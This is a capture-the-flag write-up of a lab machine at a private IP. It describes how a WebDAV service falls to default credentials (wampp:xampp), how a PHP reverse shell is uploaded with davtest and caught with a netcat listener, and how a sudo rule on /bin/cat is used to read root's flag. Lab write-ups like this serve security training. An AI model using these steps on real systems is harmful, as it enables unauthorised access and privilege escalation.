Skip to main content

Dav

This report details the successful exploitation of a misconfigured WebDAV service on the target system (10.10.168.117). The vulnerability allowed for the upload of a malicious PHP reverse shell, leading to command execution as the www-data user. Further, a sudo misconfiguration permitted privilege escalation to the root user, granting full administrative control over the system. The root flag was successfully retrieved.

1. Reconnaissance and Enumeration

1.1. Port Scanning

export TARGET_IP=10.10.168.117  # Best practice: define target at the beginning
nmap -p- --min-rate 5000 $TARGET_IP

Results:

PORT   STATE SERVICE
80/tcp open http

Interpretation:

  • Port 80 (HTTP) was found to be open, indicating a web server.

1.2. Web Directory Enumeration

The feroxbuster tool was used to enumerate directories and files on the web server, utilizing a common wordlist. This helps identify hidden or less obvious resources.

feroxbuster -u http://$TARGET_IP -w /usr/share/wordlists/dirb/common.txt

Results:

401      GET       14l       54w      460c http://10.10.168.117/webdav

Interpretation:

  • A directory /webdav was discovered, returning a 401 (Unauthorized) HTTP status code. This strongly suggests the presence of a WebDAV service requiring authentication.

2. Vulnerability Analysis and Exploitation: WebDAV

2.1. WebDAV Authentication Bypass (Default Credentials)

The presence of a 401 response on the /webdav directory prompted an investigation into default WebDAV credentials. External resources (blog posts and forum discussions) were consulted:

These resources suggested the default credentials wampp:xampp for some XAMPP WebDAV configurations. These credentials were used to successfully authenticate to the /webdav service.

2.2. File Enumeration

After successful authentication, the directory listing was explored.

  • Discovered passwd.dav containing wampp:$apr1$Wm2VTkFL$PVNRQv7kzqXQIHe14qKA91

2.3. WebDAV File Upload (Reverse Shell)

The davtest tool was used to confirm the ability to upload files to the WebDAV server. This tool specifically tests for WebDAV vulnerabilities, including file upload capabilities. A PHP reverse shell from revshells.com (using the PentestMonkey script) was used.

davtest -auth wampp:xampp -url http://10.10.168.117/webdav -uploadfile phppentestmonkey.php -uploadloc phppentestmonkey.php

Results:

********************************************************
Testing DAV connection
OPEN SUCCEED: http://10.10.168.117/webdav
********************************************************
unless Uploading file
Upload succeeded: http://10.10.168.117/webdav/phppentestmonkey.php

Interpretation:

  • davtest confirmed that arbitrary file uploads were possible. The PHP reverse shell was successfully uploaded to the server.

2.4. Gaining a Shell

A Netcat listener was established on the attacker's machine to receive the reverse shell connection.

nc -lvnp 6666

The uploaded PHP reverse shell (phppentestmonkey.php) was then accessed via a web browser (or curl), triggering the connection back to the listener. This established a command shell on the target system.

# Commands executed *after* gaining the shell:
id
# Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)

3. Privilege Escalation

3.1. sudo Misconfiguration

The sudo -l command was executed to determine if the current user (www-data) had any elevated privileges via sudo.

sudo -l
# Output: (ALL) NOPASSWD: /bin/cat

Interpretation:

  • The www-data user was permitted to execute /bin/cat as any user (including root) without requiring a password.

3.2. Gaining Root Access

The sudo misconfiguration was exploited to read the contents of the /root/root.txt file, which is typically only readable by the root user.

sudo cat /root/root.txt